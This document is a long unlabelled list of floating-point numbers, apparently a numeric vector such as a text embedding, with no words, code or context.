-0.002603708766400814, -0.02884322963654995, 0.009723770432174206, -0.020494608208537102, 0.00018814501527231187, -0.022854002192616463, -0.02029915526509285, 0.02979257144033909, -0.0316074900329113, 0.009290982037782669, -0.013569999486207962, -0.01195751503109932, -0.020550452172756195, -0.006264956202358007, -0.016027119010686874, -0.0011823141248896718, 0.014121455140411854, -0.03761067986488342, -0.029876336455345154, -0.020410843193531036, -0.023175101727247238, -0.01668328233063221, -0.010372952558100224, 0.01320701651275158, -0.004788590595126152, 0.01782807521522045, 0.009144392795860767, -0.01305344607681036, 0.010784799233078957, -0.011140801943838596, 0.034902263432741165, 0.025674104690551758, -0.010673112235963345, 0.01840047352015972, 0.02593936212360859, 0.003020790871232748, 0.01374451071023941, -0.004285997711122036, 0.006250995211303234, 0.002649081638082862, 0.018079372122883797, 0.0229656882584095, -0.005008474923670292, 0.010666131041944027, -0.03414837270975113, -0.005661147180944681, -0.012215792201459408, 0.006945550441741943, 0.0071375127881765366, -0.0013812570832669735, -0.02492021583020687, -0.002160449977964163, 0.04017948359251022, 0.009004783816635609, -0.01577582210302353, -0.00798563752323389, -0.012111085467040539, 0.004851414356380701, -0.02644195407629013, 0.007399279624223709, -0.0016456416342407465, -0.01257877517491579, -0.01563621312379837, 0.029876336455345154, -0.03124450519680977, -0.009772633202373981, -0.018889104947447777, 0.01382827665656805, -0.04718786105513573, 0.0044849407859146595, -0.005762363784015179, -0.011280410923063755, 0.017939763143658638, -0.028759464621543884, 0.007859990000724792, 0.002624650252982974, -0.005898482631891966, 0.0037938759196549654, -0.02715395949780941, 0.03540485352277756, 0.01934981532394886, 0.008858194574713707, -0.01803748868405819, -0.015454721637070179, 0.006540684029459953, 0.00849521066993475, 0.0035774819552898407, 0.013563019223511219, 0.009416630491614342, 0.0029579668771475554, -0.00554596958681941, -0.02677701599895954, -0.0010810976382344961, -0.02965296246111393, 0.00019152616732753813, 0.0013166879070922732, -0.012250694446265697, -0.002026076428592205, -0.007224768400192261, 0.017604701220989227, 0.0031342231668531895, 0.022169917821884155, -0.019531305879354477, 0.015831666067242622, 0.003999799489974976, -0.0005322595243342221, 0.0024257071781903505, -0.022449135780334473, -0.00853011291474104, -0.01654367335140705, 0.0032546359580010176, -0.009968086145818233, -0.04235738515853882, 0.01854008249938488, -0.017381327226758003, -0.009360786527395248, 0.02339847758412361, 0.019098518416285515, 0.018456315621733665, -0.005050357431173325, 0.01654367335140705, -0.028899073600769043, -0.01193657424300909, 0.02475268393754959, -0.009884321130812168, -0.01075687725096941, -0.011803945526480675, 0.010289186611771584, 0.003087105229496956, -0.01675308682024479, 0.025003980845212936, 0.024208208546042442, -0.005647186189889908, 0.01050558127462864, 0.014009768143296242, 0.02718188241124153, 0.016096923500299454, 0.018721573054790497, -0.013200035318732262, 0.030686069279909134, 0.0079507352784276, 0.02603708766400814, -0.008732546120882034, 0.018344629555940628, -0.003657757071778178, 0.008983842097222805, 0.0069280993193387985, -0.0091862753033638, 0.005828677676618099, -0.004090545233339071, 0.0031359682325273752, -0.024878332391381264, 0.0041219573467969894, -0.006767548620700836, 0.0031185171101242304, -0.002526923781260848, 0.002230254700407386, -0.016697242856025696, 0.02653968147933483, -0.018568003550171852, -0.016529710963368416, -0.004662942141294479, 0.001466767629608512, 0.015957314521074295, 0.02536696381866932, 0.00344834360294044, -0.003912543877959251, 0.005158554296940565, -0.004460509400814772, 0.03063022531569004, -0.003273832146078348, 0.013151172548532486, 0.0032214787788689137, -0.0026630426291376352, -0.009430591017007828, 0.014966090209782124, -0.010987232439219952, 0.004118467215448618, -0.014966090209782124, 0.011929593048989773, 0.01668328233063221, 0.00960510317236185, 0.018093332648277283, 0.008914037607610226, -0.018149176612496376, -0.010666131041944027, 0.009835457429289818, -0.005347026512026787, 0.014051650650799274, 0.0169904213398695, -0.02681889943778515, 0.021388106048107147, 0.00213252822868526, -0.006006679497659206, -0.010498601011931896, -0.008278816938400269, -0.014240123331546783, 0.030239321291446686, -0.009758672676980495, 0.0010540483053773642, 0.000314338511088863, -0.005050357431173325, 0.005853109527379274, -0.0037066203076392412, -0.005231849383562803, 0.002127292798832059, 0.0075598303228616714, -0.022812118753790855, -0.010708014480769634, 0.01298364158719778, 0.010945349931716919, -0.006816411856561899, -0.01641802489757538, -0.011454923078417778, 0.014170318841934204, 0.006617469247430563, -0.00040988344699144363, -0.026078971102833748, -0.0037485030479729176, -0.0010749896755442023, -0.0006692509050481021, -0.0075668105855584145, 0.0036996398121118546, 0.011622453108429909, -0.016222571954131126, -0.016794968396425247, 0.005703029688447714, -0.007322494871914387, -0.012837052345275879, 0.005130632780492306, 0.02346828207373619, -0.006767548620700836, -0.02600916661322117, -0.0020173508673906326, -0.009954125620424747, -0.004826982971280813, -0.01770242676138878, -0.014002787880599499, -0.007364377379417419, -0.00550408661365509, -0.008962901309132576, 0.017842037603259087, -0.022770235314965248, -0.008893096819519997, 0.0011360686039552093, -0.0018271334702149034, 0.01948942430317402, -0.0025077275931835175, 0.01928001083433628, 0.008704624138772488, -0.00812524650245905, -0.0026229049544781446, 0.02201634645462036, -0.011629434302449226, 0.005011965055018663, 0.007545869331806898, -0.0033977353014051914, 0.03163541108369827, 0.0011011663591489196, 0.007748302537947893, 0.02499002031981945, 0.007999598979949951, -0.003909053280949593, 0.00463502062484622, 0.023007571697235107, -0.0017285345820710063, -0.019168322905898094, -0.03557238727807999, -0.021094927564263344, -0.01780015416443348, 0.001564493984915316, 0.00649182079359889, -0.018763456493616104, -0.0026124343276023865, 0.021080967038869858, 0.04107298329472542, 0.00482000270858407, 0.01786995865404606, -0.001109891920350492, 0.010428796522319317, -0.030071789398789406, -0.01786995865404606, 0.013681687414646149, 0.003936975263059139, -0.008662741631269455, 0.008732546120882034, -0.0026455915067344904, 0.007755282800644636, -0.012585756368935108, -0.003692659316584468, 0.03786197304725647, -0.0018917026463896036, -0.012606697157025337, -0.020676100626587868, 0.012474068440496922, 0.01465895026922226, -0.006059032864868641, -0.003148184157907963, 0.03063022531569004, -0.030183477327227592, 0.006655861623585224, -0.013514156453311443, -0.007650576066225767, 0.006505781784653664, 0.013905061408877373, 0.011838847771286964, -0.00014157230907585472, -0.01604107953608036, 0.003169125411659479, 0.0046315304934978485, 0.00846030842512846, -0.008879135362803936, 0.015147581696510315, -0.006624449510127306, 0.006613978650420904, -0.002619414823129773, -0.014379732310771942, -0.006544174160808325, -0.0006910648080520332, 0.028242910280823708, -0.021053044125437737, -0.015831666067242622, -0.0030853599309921265, 0.0015749646117910743, 0.0033593426924198866, -0.016404064372181892, -0.022909846156835556, -0.003675208194181323, -0.030211398378014565, -0.007762263063341379, 0.009751692414283752, 0.011503785848617554, -0.018079372122883797, 0.014030709862709045, 0.0012782954145222902, 0.011308332905173302, 0.032612673938274384, 0.010931388475000858, 0.013967885635793209, -0.016864772886037827, -0.01306740753352642, -0.020508568733930588, 0.0085440743714571, 0.0008258747984655201, 0.0016334259416908026, 0.004404665436595678, 0.022909846156835556, 0.023719577118754387, 0.033952921628952026, 0.009325884282588959, 0.026693250983953476, 0.011189665645360947, 0.0043313708156347275, 0.030099712312221527, -0.0024152365513145924, 0.00996110588312149, 0.017297562211751938, -0.012173909693956375, 0.00685480423271656, -0.03060230426490307, 0.007957715541124344, 0.002926554763689637, 0.00007138603541534394, 0.005469184368848801, -0.006387114059180021, 0.0037589736748486757, -0.012522932142019272, -0.00920023676007986, 0.004083564970642328, 0.009688868187367916, 0.014065612107515335, -0.013311723247170448, 0.007922813296318054, 0.001752093550749123, -0.01308834832161665, 0.007238729391247034, -0.0169904213398695, 0.006753587629646063, 0.010589346289634705, -0.00000481951155961724, -0.00999600812792778, 0.009011764079332352, -0.005668127443641424, -0.01606900244951248, 0.01782807521522045, 0.0034413631074130535, 0.006100915372371674, 0.023077376186847687, 0.025674104690551758, -0.0010479404591023922, 0.004223173949867487, -0.00218662666156888, -0.010987232439219952, 0.017604701220989227, 0.007043276447802782, -0.0010531757725402713, 0.010296167805790901, 0.0017512210179120302, -0.011873750016093254, -0.012236732989549637, -0.032473064959049225, 0.0007918450864963233, -0.004914238583296537, 0.006900177337229252, 0.0137794129550457, 0.007936774753034115, 0.02320302464067936, 0.015035894699394703, -0.01075687725096941, -0.008914037607610226, -0.0328918918967247, -0.008160148747265339, 0.00039286859100684524, 0.01732548326253891, 0.011615472845733166, 0.01880533993244171, 0.022756274789571762, -0.004244115203619003, -0.00002684474748093635, -0.0009537043515592813, 0.02087155357003212, 0.029541274532675743, -0.012083163484930992, 0.019838446751236916, -0.02060629613697529, 0.016027119010686874, 0.007901872508227825, 0.01644594594836235, -0.006893197074532509, 0.002432687673717737, -0.0036542669404298067, -0.0014135416131466627, -0.01722775772213936, -0.006052052136510611, 0.0029579668771475554, 0.006432487163692713, 0.00342740211635828, 0.016641398891806602, -0.0037066203076392412, -0.014142396859824657, -0.016641398891806602, 0.005542479455471039, 0.011105899699032307, -0.0020295665599405766, -0.019964095205068588, -0.006055542733520269, -0.009919223375618458, 0.004467489663511515, 0.02806141972541809, -0.003580972086638212, -0.006613978650420904, -0.014756676740944386, 0.009284001775085926, -0.015566409565508366, 0.008753487840294838, -0.012704423628747463, 0.027000389993190765, 0.007385318633168936, -0.0013280310668051243, -0.013137212023139, 0.0069769625551998615, -0.013835256919264793, -0.002598473569378257, 0.002504237461835146, -0.0020731943659484386, 0.010666131041944027, 0.01308834832161665, -0.013639803975820541, 0.010051852092146873, -0.003999799489974976, -0.017758270725607872, 0.016320297494530678, -0.020019937306642532, -0.013360586017370224, -0.003340146504342556, -0.0026281403843313456, -0.012201830744743347, 0.0049631018191576, -0.023524124175310135, 0.002928299829363823, -0.010135617107152939, 0.0003483682230580598, 0.005594832822680473, -0.0037973662838339806, -0.006736136507242918, -0.02006182074546814, -0.0275588259100914, -0.0012163438368588686, 0.009409650228917599, -0.006205622106790543, -0.004198742099106312, -0.007308533880859613, 0.014826481230556965, -0.01345831248909235, 0.01418427936732769, 0.018791377544403076, -0.023789381608366966, -0.011538688093423843, -0.029429588466882706, -0.006847823970019817, -0.01756281778216362, -0.014966090209782124, 0.030518539249897003, 0.004149878863245249, 0.017297562211751938, -0.008222972974181175, -0.007008374202996492, -0.015580370090901852, 0.008983842097222805, -0.013311723247170448, -0.018023528158664703, -0.012781208381056786, 0.01236238144338131, -0.0041778008453547955, -0.02087155357003212, -0.009940164163708687, -0.015356995165348053, -0.012152967974543571, 0.015454721637070179, 0.010763857513666153, -0.03370162472128868, 0.004844434093683958, 0.004219683352857828, 0.01725567877292633, -0.0170881487429142, 0.0040242308750748634, 0.014728754758834839, -0.005095730535686016, 0.005312124267220497, -0.0008332915022037923, -0.00003386610114830546, 0.004980552941560745, 0.006310329306870699, -0.0063138194382190704, 0.004924709443002939, -0.001395217957906425, -0.009284001775085926, -0.011999397538602352, 0.012844032607972622, -0.0016630928730592132, 0.03347824886441231, -0.008662741631269455, -0.02796369232237339, -0.003493716474622488, 0.021192653104662895, 0.017004381865262985, 0.005751892924308777, -0.011838847771286964, -0.00482000270858407, -0.0177303496748209, -0.004554745275527239, 0.010240323841571808, -0.02265854924917221, -0.013395488262176514, -0.0058915019035339355, 0.0012486284831538796, -0.0053749484941363335, -0.010456717573106289, 0.01144794188439846, -0.015566409565508366, 0.011015154421329498, -0.00967490766197443, -0.005357497371733189, 0.0028899074532091618, 0.026763055473566055, 0.016027119010686874, 0.017479052767157555, -0.020997202023863792, -0.0009449787903577089, 0.006847823970019817, 0.0009074588306248188, 0.014644989743828773, 0.0020365470554679632, -0.0104218153283, 0.008411445654928684, 0.010777818970382214, -0.001977213192731142, 0.016962500289082527, 0.0001898901246022433, -0.0006936824647709727, -0.0014100513653829694, -0.01880533993244171, 0.008802350610494614, 0.021862776950001717, 0.01273234561085701, -0.0035949330776929855, -0.01352811697870493, -0.005298163276165724, -0.012488029897212982, 0.0058915019035339355, -0.023998795077204704, 0.008355601690709591, -0.012166928499937057, 0.020285194739699364, -0.009067608043551445, 0.014393692836165428, -0.011475863866508007, -0.004973572213202715, 0.022784197703003883, 0.008872155100107193, 0.000007662137250008527, 0.007385318633168936, 0.0036054037045687437, 0.014421614818274975, 0.016641398891806602, 0.013004583306610584, 0.010261265560984612, -0.01641802489757538, 0.01155264861881733, 0.01035201083868742, 0.03303150087594986, 0.00733645586296916, -0.003895092522725463, 0.0037275615613907576, -0.004219683352857828, 0.015175503678619862, 0.002504237461835146, 0.02303549274802208, -0.026316305622458458, -0.03157956898212433, 0.01546868309378624, -0.003828778164461255, -0.016501789912581444, -0.007308533880859613, 0.01155264861881733, -0.006359192077070475, 0.009535297751426697, 0.010568405501544476, -0.005329575389623642, -0.01830274611711502, 0.005629735067486763, 0.008516152389347553, 0.0029736727010458708, 0.010533503256738186, 0.03130035102367401, 0.03903469070792198, 0.005151574034243822, -0.009507376700639725, -0.010372952558100224, 0.0015304642729461193, -0.022812118753790855, -0.005647186189889908, 0.01786995865404606, -0.0028131224680691957, -0.01965695433318615, -0.012369361706078053, 0.0045407842844724655, 0.018121255561709404, 0.01637614145874977, 0.0056402054615318775, 0.0012922562891617417, 0.013318703509867191, -0.004614078905433416, 0.004219683352857828, -0.004572196397930384, -0.0028899074532091618, 0.01928001083433628, -0.016571594402194023, 0.04414438083767891, 0.00035534866037778556, -0.010519541800022125, 0.00315341935493052, -0.0031063014175742865, 0.0009563220082782209, -0.0005977012333460152, 0.009514356963336468, -0.011371157132089138, -0.026944546028971672, 0.010945349931716919, -0.025017941370606422, -0.0034867359790951014, -0.01193657424300909, 0.03590744733810425, 0.0009057137067429721, 0.008983842097222805, -0.005050357431173325, 0.007189866155385971, 0.006743117235600948, -0.008041481487452984, -0.014407654292881489, 0.02901076152920723, 0.00725967064499855, 0.01863780803978443, -0.010051852092146873, 0.022002385929226875, -0.008202032186090946, -0.008404464460909367, 0.005165535025298595, 0.027405256405472755, -0.005870560649782419, -0.019112478941679, 0.003094085492193699, 0.0014624048490077257, 0.0077273608185350895, -0.00634872168302536, 0.002191862091422081, -0.004984043072909117, -0.02137414552271366, 0.013730550184845924, -0.01606900244951248, -0.0176326222717762, -0.017213795334100723, -0.026455914601683617, -0.01047067902982235, -0.0077203805558383465, 0.000002184799768656376, 0.013402468524873257, -0.008202032186090946, -0.01491024624556303, -0.011029114946722984, -0.019810523837804794, -0.005716990679502487, 0.018903065472841263, -0.01580374501645565, -0.01531511265784502, -0.014575185254216194, -0.010093734599649906, -0.023691656067967415, -0.005898482631891966, 0.0021220576018095016, -0.010023930110037327, -0.0024030208587646484, -0.013695647940039635, 0.01611088402569294, -0.007524928078055382, 0.0170881487429142, 0.007825087755918503, 0.008355601690709591, 0.001992919249460101, 0.008006579242646694, 0.017786193639039993, 0.007846028544008732, -0.0026892193127423525, 0.02353808656334877, -0.005483145359903574, -0.00042515317909419537, -0.01261367741972208, -0.0059333848766982555, -0.012871954590082169, -0.017297562211751938, 0.0021552147809416056, -0.006805941462516785, -0.033617857843637466, 0.005975267384201288, -0.021709207445383072, -0.002163940342143178, 0.021360184997320175, -0.02327282913029194, -0.0014702577609568834, -0.0069909230805933475, -0.001900428207591176, -0.0034361276775598526, 0.00853011291474104, -0.002345432061702013, 0.02070402167737484, 0.024208208546042442, 0.011385117657482624, 0.01411447487771511, -0.00013295579992700368, -0.011468883603811264, 0.007552849594503641, 0.0011683532502502203, 0.00653370376676321, 0.021025123074650764, -0.03177502006292343, 0.0018445845926180482, 0.013255879282951355, -0.016390101984143257, 0.02258874475955963, 0.0076156738214194775, 0.006952530704438686, -0.0010034400038421154, 0.015454721637070179, -0.012955719605088234, -0.012488029897212982, 0.017339443787932396, -0.004457018803805113, -0.011468883603811264, -0.00029187017935328186, 0.003664737567305565, -0.006558135151863098, 0.028619855642318726, -0.0015636213356629014, -0.028494207188487053, 0.01320701651275158, 0.004467489663511515, -0.00213252822868526, -0.001741622923873365, 0.0007093884632922709, 0.014037690125405788, 0.009451532736420631, 0.024236131459474564, 0.005015455186367035, 0.007748302537947893, -0.012871954590082169, -0.009353806264698505, 0.012404263950884342, 0.01229257695376873, -0.005898482631891966, -0.003961406648159027, -0.024222170934081078, 0.00514110317453742, -0.0004820875183213502, -0.01668328233063221, 0.012111085467040539, 0.007441162597388029, 0.01506381668150425, -0.011133821681141853, 0.014156357385218143, -0.012857994064688683, 0.012495010159909725, -0.004059133119881153, -0.033757466822862625, 0.00027005624724552035, -0.01884722150862217, -0.0011072743218392134, -0.03283604979515076, 0.009856399148702621, -0.0091862753033638, 0.004254585597664118, 0.002284353133291006, -0.0036996398121118546, -0.02087155357003212, 0.0037764247972518206, -0.002664787694811821, -0.000609917042311281, -0.00554596958681941, -0.010149577632546425, 0.0012660796055570245, -0.0022162937093526125, 0.020047860220074654, -0.01742320880293846, -0.023356594145298004, 0.02282607927918434, -0.006062522996217012, -0.004879336338490248, 0.0010182735277339816, 0.0051236520521342754, 0.010610288009047508, 0.014247103594243526, 0.00710959080606699, -0.0038741512689739466, 0.014365771785378456, 0.02279815822839737, 0.022616665810346603, -0.005273731891065836, -0.011259470134973526, 0.005741422064602375, -0.022267643362283707, -0.007832068018615246, 0.009095530025660992, 0.0036507765762507915, -0.013241918757557869, -0.000010913773621723522, -0.018121255561709404, 0.003601913573220372, -0.02025727368891239, 0.005744912661612034, 0.00842540618032217, 0.014393692836165428, 0.004279017448425293, -0.0037170909345149994, -0.012557834386825562, -0.013967885635793209, 0.005469184368848801, -0.00733645586296916, 0.019908251240849495, 0.009898281656205654, 0.002350667491555214, -0.01989428885281086, 0.020983239635825157, -0.0046315304934978485, 0.01320701651275158, -0.01654367335140705, 0.0008760467753745615, -0.008146188221871853, 0.00462803989648819, 0.021723167970776558, 0.026804937049746513, -0.011015154421329498, -0.0015924157341942191, 0.006139308214187622, -0.018288785591721535, 0.013227957300841808, -0.006160249467939138, -0.0022773726377636194, 0.00812524650245905, 0.0037101104389876127, -0.038113269954919815, -0.0016578574432060122, -0.020885514095425606, 0.005053847562521696, -0.0163482204079628, -0.033589936792850494, -0.028550051152706146, -0.014086552895605564, -0.023384515196084976, 0.031188661232590675, -0.021765051409602165, 0.0031621449161320925, -0.00001207263812830206, 0.004463999532163143, -0.006285897456109524, 0.0004301703884266317, 0.019740719348192215, -0.01979656331241131, 0.02596728317439556, 0.006422016303986311, 0.00597875751554966, 0.0018882123986259103, -0.02434781938791275, 0.0006718685617670417, 0.011308332905173302, -0.006847823970019817, -0.013870159164071083, -0.0037066203076392412, 0.005839148536324501, 0.007102610543370247, -0.00517600541934371, 0.008725565858185291, -0.011224567890167236, -0.008802350610494614, 0.019950132817029953, 0.012948739342391491, 0.004111486487090588, 0.0215835589915514, 0.01305344607681036, -0.0009737731306813657, 0.021834855899214745, -0.008195050992071629, 0.0192102063447237, -0.005458713974803686, 0.01273234561085701, -0.017814114689826965, -0.0015313368057832122, 0.020829670131206512, -0.01003091037273407, -0.018260864540934563, 0.01003091037273407, 0.020243313163518906, 0.021485833451151848, 0.004401175305247307, -0.009905261918902397, -0.004160349722951651, -0.005046867299824953, -0.0066837831400334835, 0.016599515452980995, -0.030378930270671844, 0.0002713651047088206, 0.00046681775711476803, 0.0005793775781057775, -0.025981243699789047, 0.003964897245168686, 0.012083163484930992, -0.007161944173276424, 0.019964095205068588, 0.008907057344913483, -0.0030556931160390377, 0.0145193412899971, 0.015566409565508366, -0.012488029897212982, 0.0019702326972037554, -0.020033899694681168, 0.01539887860417366, -0.0016657104715704918, 0.01611088402569294, 0.027405256405472755, -0.0020522531121969223, 0.0176326222717762, -0.0014432085445150733, 0.028647776693105698, -0.021429989486932755, -0.014065612107515335, -0.015245308168232441, -0.0026159246917814016, 0.01425408385694027, 0.00773434154689312, -0.024543270468711853, 0.009277021512389183, -0.0076715173199772835, -0.009737730957567692, 0.002745063044130802, -0.009772633202373981, -0.01298364158719778, -0.004984043072909117, -0.019936172291636467, -0.0013716588728129864, -0.012453127652406693, 0.009360786527395248, 0.014023729600012302, -0.004676903132349253, -0.00879537034779787, -0.019293971359729767, 0.004519843030720949, 0.010072792880237103, -0.011084958910942078, -0.00911647081375122, -0.012739325873553753, 0.004069603979587555, 0.002949241315945983, -0.025073785334825516, -0.01031710859388113, 0.004753688350319862, -0.02120661549270153, 0.005605303216725588, -0.01428898610174656, 0.00539588974788785, -0.022337447851896286, 0.003158654784783721, 0.012334459461271763, -0.004575686529278755, -0.030211398378014565, -0.007587751839309931, -0.015887510031461716, 0.029764650389552116, -0.0019580170046538115, 0.008083363994956017, 0.0016796713462099433, 0.0065720961429178715, 0.0004114104085601866, -0.008362581953406334, 0.0009816261008381844, 0.006784999743103981, 0.02218387834727764, 0.0091862753033638, -0.020285194739699364, -0.013165133073925972, 0.0008215120178647339, -0.005661147180944681, -0.011175704188644886, 0.013953925110399723, 0.023454319685697556, 0.013130230829119682, 0.03816911578178406, -0.0075737908482551575, -0.024124443531036377, 0.02718188241124153, -0.02177901193499565, 0.008837252855300903, 0.014177299104630947, 0.009207217022776604, -0.002301804255694151, -0.00054665666539222, -0.0011221077293157578, 0.024640997871756554, -0.003587952582165599, 0.0015418074326589704, 0.00220756814815104, 0.002800906542688608, -0.009549259208142757, 0.019307931885123253, 0.012355401180684566, -0.01979656331241131, 0.026693250983953476, -0.003982348367571831, 0.008927999064326286, 0.009598121978342533, 0.0016456416342407465, 0.008788390085101128, 0.016264453530311584, 0.008292777463793755, 0.023524124175310135, -0.0008114775991998613, -0.0045407842844724655, -0.012746306136250496, -0.005696049425750971, -0.0019161342643201351, 0.008585956878960133, -0.006244014948606491, -0.0076924585737288, -0.008809330873191357, -0.009053646586835384, -0.016571594402194023, -0.009039686061441898, -0.004826982971280813, -0.025813713669776917, 0.025073785334825516, 0.012676501646637917, -0.01563621312379837, -0.008606897667050362, 0.0052702417597174644, 0.0045896475203335285, -0.017074186354875565, -0.014177299104630947, 0.02096927911043167, 0.012187870219349861, -0.023216985166072845, 0.010205421596765518, -0.0038532097823917866, 0.020717984065413475, 0.0065232329070568085, -0.004013760015368462, 0.01381431519985199, 0.0017145737074315548, -0.0006509271916002035, -0.015887510031461716, -0.017786193639039993, 0.0051236520521342754, 0.0010793524561449885, 0.00008763740333961323, 0.005329575389623642, -0.0016107393894344568, -0.010680092498660088, 0.0015915432013571262, 0.0005200437153689563, -0.005385419353842735, -0.003317460184916854, -0.010498601011931896, 0.001428375137038529, 0.01641802489757538, -0.03155164420604706, -0.04143596813082695, 0.012746306136250496, 0.020019937306642532, 0.014756676740944386, -0.005053847562521696, 0.00594385527074337, 0.0001665492309257388, 0.001581945107318461, 0.010002988390624523, -0.009325884282588959, 0.005650676321238279, 0.00693158945068717, 0.017981646582484245, -0.0037485030479729176, 0.004397685173898935, -0.013409449718892574, 0.0169904213398695, -0.015887510031461716, 0.01280215010046959, 0.001186676905490458, 0.006422016303986311, -0.026958508417010307, 0.013325683772563934, -0.03252890706062317, -0.022881923243403435, -0.0015636213356629014, 0.00809034425765276, -0.009311923757195473, -0.003947446122765541, 0.031998395919799805, -0.004467489663511515, 0.004984043072909117, 0.019838446751236916, -0.017297562211751938, -0.0018690162105485797, 0.015161543153226376, -0.016906656324863434, 0.0026019637007266283, 0.011036095209419727, 0.004704825114458799, 0.010268245823681355, -0.019545266404747963, -0.0059403651393949986, 0.01342341024428606, -0.00960510317236185, 0.003947446122765541, 0.004432587418705225, 0.024026717990636826, -0.023928990587592125, 0.011203626170754433, -0.004481450654566288, -0.010854603722691536, 0.010966290719807148, -0.006139308214187622, 0.015496605075895786, 0.003291283268481493, -0.022742314264178276, 0.026623446494340897, 0.009619063697755337, 0.0023471771273761988, -0.013381527736783028, -0.009765652939677238, -0.0026229049544781446, 0.018428394570946693, 0.00007362195901805535, -0.001323668286204338, -0.010135617107152939, 0.01193657424300909, 0.005127142183482647, 0.003968387376517057, -0.0046315304934978485, 0.016306336969137192, 0.020019937306642532, -0.017674505710601807, 0.0014702577609568834, 0.011392098851501942, 0.0026665327604860067, 0.01756281778216362, -0.015608292073011398, -0.01141303963959217, -0.006083464249968529, 0.009088548831641674, 0.004781609866768122, 0.009423610754311085, 0.004551255144178867, -0.011762062087655067, 0.012180889956653118, 0.018526121973991394, -0.0254367683082819, -0.01104307547211647, 0.006994413677603006, 0.0018498199060559273, 0.009367767721414566, -0.023552047088742256, 0.016725163906812668, -0.008299757726490498, -0.01594335399568081, 0.014938168227672577, 0.011699238792061806, 0.010149577632546425, 0.01611088402569294, -0.023258868604898453, -0.008627839386463165, 0.0029509863816201687, 0.014107494615018368, -0.01425408385694027, 0.0011605002218857408, 0.021094927564263344, -0.021485833451151848, -0.008327679708600044, -0.0023210004437714815, 0.028591932728886604, -0.011880730278789997, 0.01229257695376873, 0.007825087755918503, 0.0034239119850099087, 0.014177299104630947, -0.022449135780334473, -0.005420321598649025, -0.0010470679262652993, 0.0013193055056035519, 0.001379511901177466, -0.011643394827842712, -0.019838446751236916, -0.025478651747107506, 0.026637407019734383, 0.012020339258015156, 0.00437325332313776, -0.006694253999739885, 0.0011945299338549376, 0.000728148443158716, 0.003191811963915825, -0.015301152132451534, -0.0028532599098980427, 0.016027119010686874, 0.0013768943026661873, -0.015343034639954567, -0.0035286187194287777, -0.00020537800446618348, -0.002718886360526085, 0.007497006095945835, -0.017339443787932396, -0.011433981359004974, -0.008432386443018913, -0.020676100626587868, 0.0038322685286402702, -0.0028270832262933254, -0.028340637683868408, -0.0010758622083812952, 0.0147427162155509, 0.008292777463793755, -0.004617569502443075, -0.008062422275543213, -0.005898482631891966, 0.00030626734951511025, -0.0018253882881253958, -0.0014318653848022223, -0.027433179318904877, 0.01661347784101963, -0.000023054581106407568, -0.010833662003278732, 0.019405657425522804, 0.0031848314683884382, 0.0025845125783234835, -0.001225069398060441, 0.013535097241401672, -0.0011517746606841683, 0.004341841675341129, -0.01082668174058199, -0.02127641998231411, 0.03548862040042877, -0.024361779913306236, -0.01100817322731018, 0.021164732053875923, 0.005846128799021244, -0.003554795403033495, 0.004617569502443075, -0.015496605075895786, 0.0027607688680291176, -0.016459906473755836, -0.02408256195485592, 0.024878332391381264, 0.010114675387740135, 0.020829670131206512, 0.027879927307367325, -0.00933984573930502, 0.0023157652467489243, 0.0060380916111171246, 0.005748402792960405, -0.007978657260537148, 0.01789787970483303, 0.010086754336953163, -0.009570199996232986, 0.015287190675735474, 0.02208615094423294, 0.007217788137495518, 0.013870159164071083, 0.020424803718924522, 0.0016779262805357575, -0.003066163742914796, 0.004833963233977556, 0.018386511132121086, -0.001763436826877296, -0.01685081236064434, 0.002500747097656131, -0.022770235314965248, 0.006205622106790543, -0.014812520705163479, -0.002581022446975112, 0.012704423628747463, 0.02658156305551529, 0.0005811227019876242, 0.010358992032706738, -0.024236131459474564, 0.021667324006557465, 0.025283198803663254, -0.010184479877352715, 0.014812520705163479, -0.007161944173276424, -0.0021080966107547283, 0.017381327226758003, -0.009290982037782669, 0.006167229730635881, 0.0005584362079389393, -0.008704624138772488, -0.008048461750149727, 0.006586057133972645, -0.005563420709222555, 0.020745905116200447, -0.006872255355119705, 0.008320699445903301, -0.0037205812986940145, -0.012383323162794113, 0.0027502982411533594, 0.0010182735277339816, -0.004917728714644909, -0.01851215958595276, -0.039090532809495926, -0.0024012757930904627, -0.0007774478872306645, -0.004296468570828438, -0.010896486230194569, -0.004642000887542963, 0.0017538387328386307, -0.018246902152895927, 0.0003350617189425975, -0.03448343649506569, -0.003905563149601221, 0.02917829155921936, -0.006167229730635881, -0.031970471143722534, -0.021164732053875923, -0.009130432270467281, 0.027879927307367325, 0.026190657168626785, -0.002624650252982974, 0.01606900244951248, -0.013681687414646149, -0.04339049383997917, -0.01381431519985199, 0.009067608043551445, 0.012125045992434025, -0.021765051409602165, 0.0012119810562580824, -0.004785099998116493, -0.031049052253365517, -0.006757078226655722, 0.023454319685697556, -0.009018744342029095, -0.012271635234355927, 0.010449737310409546, -0.0005553822848014534, 0.004020740743726492, -0.02485041134059429, -0.0037450126837939024, -0.0071375127881765366, -0.007538888603448868, -0.016362180933356285, 0.021164732053875923, 0.005497106350958347, 0.005570400971919298, 0.0034867359790951014, -0.0010304893366992474, -0.00849521066993475, 0.02080174908041954, -0.0022669020108878613, 0.00543777272105217, -0.012313518673181534, -0.018930986523628235, 0.018665730953216553, 0.01725567877292633, -0.015287190675735474, 0.0074132406152784824, -0.0001463713706471026, -0.01685081236064434, 0.008215992711484432, 0.0025897480081766844, 0.005231849383562803, -0.001593288267031312, 0.012857994064688683, -0.0070328060537576675, -0.0047501977533102036, 0.00883027259260416, -0.014686872251331806, 0.014072592370212078, -0.003327930811792612, 0.004676903132349253, 0.02384522557258606, 0.003905563149601221, -0.015021934174001217, -0.012194850482046604, -0.006554645020514727, -0.0010793524561449885, 0.015105699189007282, -0.009681887924671173, 0.003762464039027691, -0.015789784491062164, 0.004118467215448618, 0.02667929045855999, -0.00970980990678072, -0.016390101984143257, 0.002724121557548642, -0.00023275446437764913, 0.01901475340127945, 0.007008374202996492, -0.0034361276775598526, -0.0026002186350524426, -0.00445003854110837, -0.0055773817002773285, 0.012250694446265697, -0.0028480247128754854, 0.004760668613016605, 0.01613880693912506, 0.014966090209782124, -0.008474268950521946, -0.0003433510137256235, 0.04001195356249809, 0.0006504909251816571, -0.01222277246415615, 0.008976861834526062, -0.01618068851530552, -0.029848415404558182, -0.0008969881455413997, 0.004083564970642328, 0.04545670747756958, -0.012746306136250496, 0.006432487163692713, 0.004886316601186991, -0.01498005073517561, -0.012320498935878277, -0.0007076433976180851, -0.010240323841571808, -0.012606697157025337, 0.019670914858579636, -0.034734733402729034, -0.009451532736420631, 0.010114675387740135, -0.009849418886005878, -0.003818307537585497, 0.0019632522016763687, -0.011050056666135788, 0.013109290041029453, 